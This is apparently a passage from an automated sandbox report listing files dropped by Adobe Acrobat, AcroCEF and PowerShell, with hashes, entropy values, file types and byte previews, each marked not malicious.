                  SHA-512:52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE
                  Malicious:false
                  Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D
                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):4
                  Entropy (8bit):0.8112781244591328
                  Encrypted:false
                  SSDEEP:3:e:e
                  MD5:DC84B0D741E5BEAE8070013ADDCC8C28
                  SHA1:802F4A6A20CBF157AAF6C4E07E4301578D5936A2
                  SHA-256:81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06
                  SHA-512:65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71
                  Malicious:false
                  Preview:....
                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                  File Type:JSON data
                  Category:dropped
                  Size (bytes):2145
                  Entropy (8bit):5.072031774322975
                  Encrypted:false
                  SSDEEP:48:YW/pOrY21a4hbtC3dci5WXjJ0vS/PbMa7:wB0tWTJDnbMo
                  MD5:A452D89FDCE54BE6692EA9420E6BE437
                  SHA1:8E6CF1F3F1B9949E4DBDEE28B126260A2818E34A
                  SHA-256:21285C50FA1E9A5330702FE6A496C893DCB32871D781EBA1C7815954BB768A61
                  SHA-512:9DE7726861F51B69F70CE52668782FC663A6C7AB709DCA8A3892324471A0FF1FA04327822DA9CF082D4F0C6FCAA4DEB577034913E3D305B77F2DE82948362810
                  Malicious:false
                  Preview:{"all":[{"id":"TESTING","info":{"dg":"DG","sid":"TESTING"},"mimeType":"file","size":4,"ts":1736759609000},{"id":"DC_Reader_Home_LHP_Trial_Banner","info":{"dg":"380dd703fc581680761b4186c45e2d38","sid":"DC_Reader_Home_LHP_Trial_Banner"},"mimeType":"file","size":295,"ts":1696488387000},{"id":"DC_FirstMile_Right_Sec_Surface","info":{"dg":"35166e54b6efd9393ba2006ee9cc09b6","sid":"DC_FirstMile_Right_Sec_Surface"},"mimeType":"file","size":294,"ts":1696488385000},{"id":"DC_Reader_Disc_LHP_Banner","info":{"dg":"f776fac6300c02bf0731dc513183b5e8","sid":"DC_Reader_Disc_LHP_Banner"},"mimeType":"file","size":1250,"ts":1696488373000},{"id":"DC_Reader_Sign_LHP_Banner","info":{"dg":"78cf3d8961acebfb4fcfb54de4ad804c","sid":"DC_Reader_Sign_LHP_Banner"},"mimeType":"file","size":1250,"ts":1696486847000},{"id":"DC_Reader_Convert_LHP_Banner","info":{"dg":"4bd607a1e654cbca833e725de7ae4339","sid":"DC_Reader_Convert_LHP_Banner"},"mimeType":"file","size":1255,"ts":1696486847000},{"id":"DC_Reader_Edit_LHP_Banner"
                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                  File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 24, database pages 3, cookie 0x2, schema 4, UTF-8, version-valid-for 24
                  Category:dropped
                  Size (bytes):12288
                  Entropy (8bit):1.145968371370601
                  Encrypted:false
                  SSDEEP:24:TLhx/XYKQvGJF7ursDlxRZXcMRZXcMZgux3Fmu3n9u1oGuDyIX4uDyvuOudIUud5:TFl2GL7msDl9Xc+XcGNFlRYIX2v3kGlD
                  MD5:2EACDBDD7048CE1266098C7269B65524
                  SHA1:F413B2F5738F57976DAE59DC8E682CEE4E68A350
                  SHA-256:C6833F6A1CA9619E831E4F89A74CDBE50B37CCACB3E33260A5F235B09F15268B
                  SHA-512:6D62127B8AA9211D73EBEF01B78D4F2B69362FD9267B8E36703CF4BDA7F038DBE3958F94FD2EED90FD4B424FB98BAC803C5A495C3410E3DEC1D595A08C48FCC7
                  Malicious:false
                  Preview:SQLite format 3......@ ..........................................................................c.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                  File Type:SQLite Rollback Journal
                  Category:dropped
                  Size (bytes):8720
                  Entropy (8bit):1.552851134858841
                  Encrypted:false
                  SSDEEP:24:7+tUlxUXcMRZXcMZgux3Fmu3n9u1oGuDyIX4uDyvuOudIUudcHRuLux+JqLxx/Xr:7MUliXc+XcGNFlRYIX2vZJqVl2GL7ms1
                  MD5:CECE9A6B66DACF7FC1EE857A2F2D6696
                  SHA1:9C063A573B69017E6EF1E63DEBFFB1898EDC98D2
                  SHA-256:C459291CABA04EDB4142DEF027EFF2D3D97E24B4A26520308721F7FF59827DB5
                  SHA-512:0144DB9E08D5A880144DAAC809E9334AC979FE2F881E13760D93E948EF1515385682C296FFA85503F8A9610C896344E11EA6FB0780FB93EFA1FD5D00F3C9984D
                  Malicious:false
                  Preview:.... .c........%..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................b..b.b.b.b.b.b.b.b.b.b.b.b.b..................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):66726
                  Entropy (8bit):5.392739213842091
                  Encrypted:false
                  SSDEEP:768:RNOpblrU6TBH44ADKZEgJ4SevnTTmt3NjXSpZOa9yJuhSYyu:6a6TZ44ADEJtNjXoZOvJuhSK
                  MD5:57B1C5C3BA204653559AFC86E69E718F
                  SHA1:831D3986107CBE064CD456D3275F48D7103DD2DE
                  SHA-256:9D51FCB1329F043F315F4976EAC067CF82E7BC1E97F00747137EFBE01EF908A8
                  SHA-512:29A4F1C3807E25BD823A559289975412D37304C87276F42D4460CACB32A02BF9560BD047FC0A281DF14A1A58D8CF591E5675B6DFFCBDE3EE52A4F224397B3575
                  Malicious:false
                  Preview:4.397.90.FID.2:o:..........:F:AgencyFB-Reg.P:Agency FB.L:$.........................."F:Agency FB.#.96.FID.2:o:..........:F:AgencyFB-Bold.P:Agency FB Bold.L:%.........................."F:Agency FB.#.84.FID.2:o:..........:F:Algerian.P:Algerian.L:$..........................RF:Algerian.#.95.FID.2:o:..........:F:ArialNarrow.P:Arial Narrow.L:$.........................."F:Arial Narrow.#.109.FID.2:o:..........:F:ArialNarrow-Italic.P:Arial Narrow Italic.L:$.........................."F:Arial Narrow.#.105.FID.2:o:..........:F:ArialNarrow-Bold.P:Arial Narrow Bold.L:%.........................."F:Arial Narrow.#.118.FID.2:o:..........:F:ArialNarrow-BoldItalic.P:Arial Narrow Bold Italic.L:%.........................."F:Arial Narrow.#.77.FID.2:o:..........:F:ArialMT.P:Arial.L:$.........................."F:Arial.#.91.FID.2:o:..........:F:Arial-ItalicMT.P:Arial Italic.L:$.........................."F:Arial.#.87.FID.2:o:..........:F:Arial-BoldMT.P:Arial Bold.L:$.........................."F:Arial.#.100.FID.2
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):64
                  Entropy (8bit):1.1510207563435464
                  Encrypted:false
                  SSDEEP:3:Nlllullkv/tz:NllU+v/
                  MD5:6442F277E58B3984BA5EEE0C15C0C6AD
                  SHA1:5343ADC2E7F102EC8FB6A101508730898CB14F57
                  SHA-256:36B765624FCA82C57E4C5D3706FBD81B5419F18FC3DD7B77CD185E6E3483382D
                  SHA-512:F9E62F510D5FB788F40EBA13287C282444607D2E0033D2233BC6C39CA3E1F5903B65A07F85FA0942BEDDCE2458861073772ACA06F291FA68F23C765B0CA5CA17
                  Malicious:false
                  Preview:@...e................................................@..........
                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):246
                  Entropy (8bit):3.513199765407527
                  Encrypted:false
                  SSDEEP:6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K84jClBdKCH:Qw946cPbiOxDlbYnuRKTjUKw
                  MD5:8689166681181C500479370CCF7958DF
                  SHA1:8A881EF5DEDCCD58D02A9B55167D335703E629A3
                  SHA-256:973F53C57822DA81FAD11B4C3F6DDC81D72884429CB5285BBFF06A40DAD85916
                  SHA-512:7689604DA555806CA1D4A8A529B34C92B30175261CE70B67A06B887397BB5176984020870D7B71728594079426F6E2FB2502AF97813584FF0AED632FE1FBDEDE
                  Malicious:false
                  Preview:..E.r.r.o.r. .2.7.1.1...T.h.e. .s.p.e.c.i.f.i.e.d. .F.e.a.t.u.r.e. .n.a.m.e. .(.'.A.R.M.'.). .n.o.t. .f.o.u.n.d. .i.n. .F.e.a.t.u.r.e. .t.a.b.l.e.......=.=.=. .L.o.g.g.i.n.g. .s.t.o.p.p.e.d.:. .1.3./.0.1./.2.0.2.5. . .0.4.:.1.3.:.3.3. .=.=.=.....
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:ASCII text, with no line terminators
                  Category:dropped
                  Size (bytes):60
                  Entropy (8bit):4.038920595031593
                  Encrypted:false
                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                  Malicious:false
                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:ASCII text, with no line terminators
                  Category:dropped
                  Size (bytes):60
                  Entropy (8bit):4.038920595031593
                  Encrypted:false
                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                  Malicious:false
                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                  File Type:Zip data (MIME type "application/vnd.adobe.air-ucf-package+zip"?)
                  Category:dropped
                  Size (bytes):144514
                  Entropy (8bit):7.992637131260696
                  Encrypted:true
                  SSDEEP:3072:OvjeSq37BcXWpJ/PwBI4lsRMoZVaJctHtTx8EOyhnL:Cjc7BcePUsSSt38snL
                  MD5:BA1716D4FB435DA6C47CE77E3667E6A8
                  SHA1:AF6ADF9F1A53033CF28506F33975A3D1BC0C4ECF
                  SHA-256:AD771EC5D244D9815762116D5C77BA53A1D06CEBA42D348160790DBBE4B6769D
                  SHA-512:65249DB52791037E9CC0EEF2D07A9CB1895410623345F2646D7EA4ED7001F7273C799275C3342081097AF2D231282D6676F4DBC4D33C5E902993BE89B4A678FD
                  Malicious:false
                  Preview:PK.........D.Y...>)...).......mimetypeapplication/vnd.adobe.air-ucf-package+zipPK.........D.Y.+.`............message.xml.]is.8...[.....Oq.'...S...g.X+;....%X."U$.....}.P.%....8.tl. ...../..}......A.......,...a...r.....=..i{......0H..v.g.c0.3~....G.b....,.BvJ.'./.`xJ]..O./.!K...XG?.$.,=.Z...q.f~...,..:b.Pl..f..|....,.A.....Z..a<.C._..../G|....q.....~.?...G.............y+.. ...s.,.2...^uon..:....~....C....i.>.<hy..x..?....F.w..4e.|.'...#?..a......i...W.".+...'.......,..6..... ..}.........llj.>.3v.."..CdA.".....v...4H..C]>........4..$.O........9._..C{(....A~.k...f.x8.<... l!..}...ol.q.......2.s.Y..&:....>...l.S..w.t^D.C....]0......L...z[`J<.....L.1t-.Z.n..7.)...aj;.0.r|.._.V......JWT.>.p.?s....boN.....X.jkN.9..3jN.9..t...o..c.nX4......0.D.....Cv .....!k..........d.1B....=3.Bq.E.bo.....6..r..6@.b...T......Ig...(..(K].:...#..k..q2G."o.Tz...qJ.......;?|~..1...J...RA...'..*C...T...dNMZ.3.z-..LCI..I..-.,.Y.J.....m.KY}.Lw......G........-.(E....b..^..}..
                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                  File Type:Zip data (MIME type "application/vnd.adobe.air-ucf-package+zip"?)
                  Category:dropped
                  Size (bytes):144514
                  Entropy (8bit):7.992637131260696
                  Encrypted:true
                  SSDEEP:3072:OvjeSq37BcXWpJ/PwBI4lsRMoZVaJctHtTx8EOyhnL:Cjc7BcePUsSSt38snL
                  MD5:BA1716D4FB435DA6C47CE77E3667E6A8
                  SHA1:AF6ADF9F1A53033CF28506F33975A3D1BC0C4ECF
                  SHA-256:AD771EC5D244D9815762116D5C77BA53A1D06CEBA42D348160790DBBE4B6769D
                  SHA-512:65249DB52791037E9CC0EEF2D07A9CB1895410623345F2646D7EA4ED7001F7273C799275C3342081097AF2D231282D6676F4DBC4D33C5E902993BE89B4A678FD
                  Malicious:false
                  Preview:PK.........D.Y...>)...).......mimetypeapplication/vnd.adobe.air-ucf-package+zipPK.........D.Y.+.`............message.xml.]is.8...[.....Oq.'...S...g.X+;....%X."U$.....}.P.%....8.tl. ...../..}......A.......,...a...r.....=..i{......0H..v.g.c0.3~....G.b....,.BvJ.'./.`xJ]..O./.!K...XG?.$.,=.Z...q.f~...,..:b.Pl..f..|....,.A.....Z..a<.C._..../G|....q.....~.?...G.............y+.. ...s.,.2...^uon..:....~....C....i.>.<hy..x..?....F.w..4e.|.'...#?..a......i...W.".+...'.......,..6..... ..}.........llj.>.3v.."..CdA.".....v...4H..C]>........4..$.O........9._..C{(....A~.k...f.x8.<... l!..}...ol.q.......2.s.Y..&:....>...l.S..w.t^D.C....]0......L...z[`J<.....L.1t-.Z.n..7.)...aj;.0.r|.._.V......JWT.>.p.?s....boN.....X.jkN.9..3jN.9..t...o..c.nX4......0.D.....Cv .....!k..........d.1B....=3.Bq.E.bo.....6..r..6@.b...T......Ig...(..(K].:...#..k..q2G."o.Tz...qJ.......;?|~..1...J...RA...'..*C...T...dNMZ.3.z-..LCI..I..-.,.Y.J.....m.KY}.Lw......G........-.(E....b..^..}..
                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                  File Type:ASCII text, with very long lines (393)
                  Category:dropped
                  Size (bytes):16525
                  Entropy (8bit):5.338264912747007
                  Encrypted:false
                  SSDEEP:384:lH4ZASLaTgKoBKkrNdOZTfUY9/B6u6AJ8dbBNrSVNspYiz5LkiTjgjQLhDydAY8s:kIb
                  MD5:128A51060103D95314048C2F32A15C66
                  SHA1:EEB64761BE485729CD12BF4FBF7F2A68BA1AD7DB
                  SHA-256:601388D70DFB723E560FEA6AE08E5FEE8C1A980DF7DF9B6C10E1EC39705D4713
                  SHA-512:55099B6F65D6EF41BC0C077BF810A13BA338C503974B4A5F2AA8EB286E1FCF49DF96318B1DA691296FB71AA8F2A2EA1406C4E86F219B40FB837F2E0BF208E677
                  Malicious:false
                  Preview:SessionID=e060408f-9833-415c-bd59-cc59ace6b516.1696488385066 Timestamp=2023-10-05T08:46:25:066+0200 ThreadID=6912 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------".SessionID=e060408f-9833-415c-bd59-cc59ace6b516.1696488385066 Timestamp=2023-10-05T08:46:25:066+0200 ThreadID=6912 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found".SessionID=e060408f-9833-415c-bd59-cc59ace6b516.1696488385066 Timestamp=2023-10-05T08:46:25:067+0200 ThreadID=6912 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!".SessionID=e060408f-9833-415c-bd59-cc59ace6b516.1696488385066 Timestamp=2023-10-05T08:46:25:067+0200 ThreadID=6912 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1".SessionID=e060408f-9833-415c-bd59-cc59ace6b516.1696488385066 Timestamp=2023-10-05T08:46:25:067+0200 ThreadID=6912 Component=ngl-lib_NglAppLib Description="SetConfig:
                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                  File Type:ASCII text, with very long lines (393), with CRLF line terminators
                  Category:dropped
                  Size (bytes):15114
                  Entropy (8bit):5.3571513027854625
                  Encrypted:false
                  SSDEEP:384:PVhsYM5qpVB5smmk4VN8yXJMUXAa11RW61hTlRjgKTKeE8xqeTaFl7IfIF8xzYQL:9/rQ/
                  MD5:270E6CE81703F1CAB35E9BBBE3DA6A06
                  SHA1:8F03356DF866627E7B387ADFBFA3F0AFB3DDDED4
                  SHA-256:D410BD1900201016E813C01635422A09ABC61CF22048E202F0308AED850EE30D
                  SHA-512:EB017273A47CD45584DBAA824AA4E652AE09DD790B0050A1615BDE8508B5A4CBAA1C484AC084959BD56A3DE5DE27A1EACEC9F2A5A40F46396465147814C91532
                  Malicious:false
                  Preview:SessionID=519c21f3-89e9-4459-a6d5-bf354f9de5e0.1736759608159 Timestamp=2025-01-13T04:13:28:159-0500 ThreadID=4148 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------"..SessionID=519c21f3-89e9-4459-a6d5-bf354f9de5e0.1736759608159 Timestamp=2025-01-13T04:13:28:162-0500 ThreadID=4148 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found"..SessionID=519c21f3-89e9-4459-a6d5-bf354f9de5e0.1736759608159 Timestamp=2025-01-13T04:13:28:162-0500 ThreadID=4148 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!"..SessionID=519c21f3-89e9-4459-a6d5-bf354f9de5e0.1736759608159 Timestamp=2025-01-13T04:13:28:162-0500 ThreadID=4148 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1"..SessionID=519c21f3-89e9-4459-a6d5-bf354f9de5e0.1736759608159 Timestamp=2025-01-13T04:13:28:163-0500 ThreadID=4148 Component=ngl-lib_NglAppLib Description="SetConf
                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                  File Type:ASCII text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):29752
                  Entropy (8bit):5.398956941133226
                  Encrypted:false
                  SSDEEP:192:acb4I3dcbPcbaIO4cbYcbqnIdjcb6acbaIewcb3cbqI57cbKy:V3fOCIdJDea5py
                  MD5:3F642E3A0E86FA0A649C107AFA2FC0EA
                  SHA1:876CDA4B0FC19C83FB4A4381B0B7F907E0B6E7CC
                  SHA-256:0C44382958642E2D3A65D56FB5D3AD973FC639BC9AF331259AEEDB336956BAF0
                  SHA-512:A83DE37FDDDC1385D508FABED135A1527B5EFC6921E3AFA9FCE578260355A1B8C1F1C0F8ED6EE1AFDAA19F010E5644E4884D029D463C7C910C339CEBC3CAE240
                  Malicious:false
                  Preview:05-10-2023 08:20:22:.---2---..05-10-2023 08:20:22:.AcroNGL Integ ADC-4240758 : ***************************************..05-10-2023 08:20:22:.AcroNGL Integ ADC-4240758 : ***************************************..05-10-2023 08:20:22:.AcroNGL Integ ADC-4240758 : ******** Starting new session ********..05-10-2023 08:20:22:.AcroNGL Integ ADC-4240758 : Starting NGL..05-10-2023 08:20:22:.AcroNGL Integ ADC-4240758 : Setting synchronous launch...05-10-2023 08:20:22:.AcroNGL Integ ADC-4240758 ::::: Configuring as AcrobatReader1..05-10-2023 08:20:22:.AcroNGL Integ ADC-4240758 : NGLAppVersion 23.6.20320.6..05-10-2023 08:20:22:.AcroNGL Integ ADC-4240758 : NGLAppMode NGL_INIT..05-10-2023 08:20:22:.AcroNGL Integ ADC-4240758 : AcroCEFPath, NGLCEFWorkflowModulePath - C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1 C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow..05-10-2023 08:20:22:.AcroNGL Integ ADC-4240758 : isNGLExternalBrowserDisabled - No..05-10-2023 08:20:22:.Closing File..05-10-
                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                  File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 299538
                  Category:dropped
                  Size (bytes):758601
                  Entropy (8bit):7.98639316555857
                  Encrypted:false
                  SSDEEP:12288:ONh3P65+Tegs6121YSWBlkipdjuv1ybxrr/IxkB1mabFhOXZ/fEa+vTJJJJv+9U0:O3Pjegf121YS8lkipdjMMNB1DofjgJJg
                  MD5:3A49135134665364308390AC398006F1
                  SHA1:28EF4CE5690BF8A9E048AF7D30688120DAC6F126
                  SHA-256:D1858851B2DC86BA23C0710FE8526292F0F69E100CEBFA7F260890BD41F5F42B
                  SHA-512:BE2C3C39CA57425B28DC36E669DA33B5FF6C7184509756B62832B5E2BFBCE46C9E62EAA88274187F7EE45474DCA98CD8084257EA2EBE6AB36932E28B857743E5
                  Malicious:false
                  Preview:...........kWT..0...W`.........b..@..nn........5.._..I.R3I..9g.x....s.\+.J......F...P......V]u......t....jK...C.fD..]..K....;......y._.U..}......S.........7...Q.............W.D..S.....y......%..=.....e..^.RG......L..].T.9.y.zqm.Q]..y..(......Q]..~~..}..q...@.T..xI.B.L.a.6...{..W..}.mK?u...5.#.{...n...........z....m^.6!.`.....u...eFa........N....o..hA-..s.N..B.q..{..z.{=..va4_`5Z........3.uG.n...+...t...z.M."2..x.-...DF..VtK.....o]b.Fp.>........c....,..t..an[............5.1.(}..q.q......K3.....[>..;e..f.Y.........mV.cL...]eF..7.e.<.._.o\.S..Z...`..}......>@......|.......ox.........h.......o....-Yj=.s.g.Cc\.i..\..A.B>.X..8`...P......[..O...-.g...r..u\...k..7..#E....N}...8.....(..0....w....j.......>.L....H.....y.x3...[>..t......0..z.qw..]X..i8..w.b..?0.wp..XH.A.[.....S..g.g..I.A.15.0?._n.Q.]..r8.....l..18...(.].m...!|G.1...... .3.`./....`~......G.............|..pS.e.C....:o.u_..oi.:..|....joi...eM.m.K...2%...Z..j...VUh..9.}.....
                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                  File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 33081
                  Category:dropped
                  Size (bytes):1407294
                  Entropy (8bit):7.97605879016224
                  Encrypted:false
                  SSDEEP:24576:/xA7o5dpy6mlind9j2kvhsfFXpAXDgrFBU2/R07/WLaGZDwYIGNPJe:JVB3mlind9i4ufFXpAXkrfUs0jWLaGZo
                  MD5:A0CFC77914D9BFBDD8BC1B1154A7B364
                  SHA1:54962BFDF3797C95DC2A4C8B29E873743811AD30
                  SHA-256:81E45F94FE27B1D7D61DBC0DAFC005A1816D238D594B443BF4F0EE3241FB9685
                  SHA-512:74A8F6D96E004B8AFB4B635C0150355CEF5D7127972EA90683900B60560AA9C7F8DE780D1D5A4A944AF92B63C69F80DCDE09249AB99696932F1955F9EED443BE
                  Malicious:false
                  Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.
                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                  File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 5111142
                  Category:dropped
                  Size (bytes):1419751
                  Entropy (8bit):7.976496077007677
                  Encrypted:false
                  SSDEEP:24576:/xXwYIGNPgOWL07oYGZ1dpy6mlind9j2kvhsfFXpAXDgrFBU2/R07D:JXwZGDWLxYGZN3mlind9i4ufFXpAXkru
                  MD5:8DE7F8054D360BA016642F9E6BE20B6A
                  SHA1:E001251216DE9FFDEFA085FC232D4AA5AF1A05AE
                  SHA-256:869ED550A77944FF3966CA56F7BB9CFDA979AF710D3B068B0853697AE120EA50
                  SHA-512:59A2F077CDA34172A3005E72CF97786AE8C6C7BDB04053956FE8CF5F178B28DED5AAFC8825DC0DA09EBA89E1CB909A42634A2073D396E716639AB91642048972
                  Malicious:false
                  Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.
                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                  File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1311022
                  Category:dropped
                  Size (bytes):386528
                  Entropy (8bit):7.9736851559892425
                  Encrypted:false
                  SSDEEP:6144:8OSTJJJJEQ6T9UkRm1lBgI81ReWQ53+sQ36X/FLYVbxrr/IxktOQZ1mau4yBwsOo:sTJJJJv+9UZX+Tegs661ybxrr/IxkB1m
                  MD5:5C48B0AD2FEF800949466AE872E1F1E2
                  SHA1:337D617AE142815EDDACB48484628C1F16692A2F
                  SHA-256:F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE
                  SHA-512:44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324
                  Malicious:false
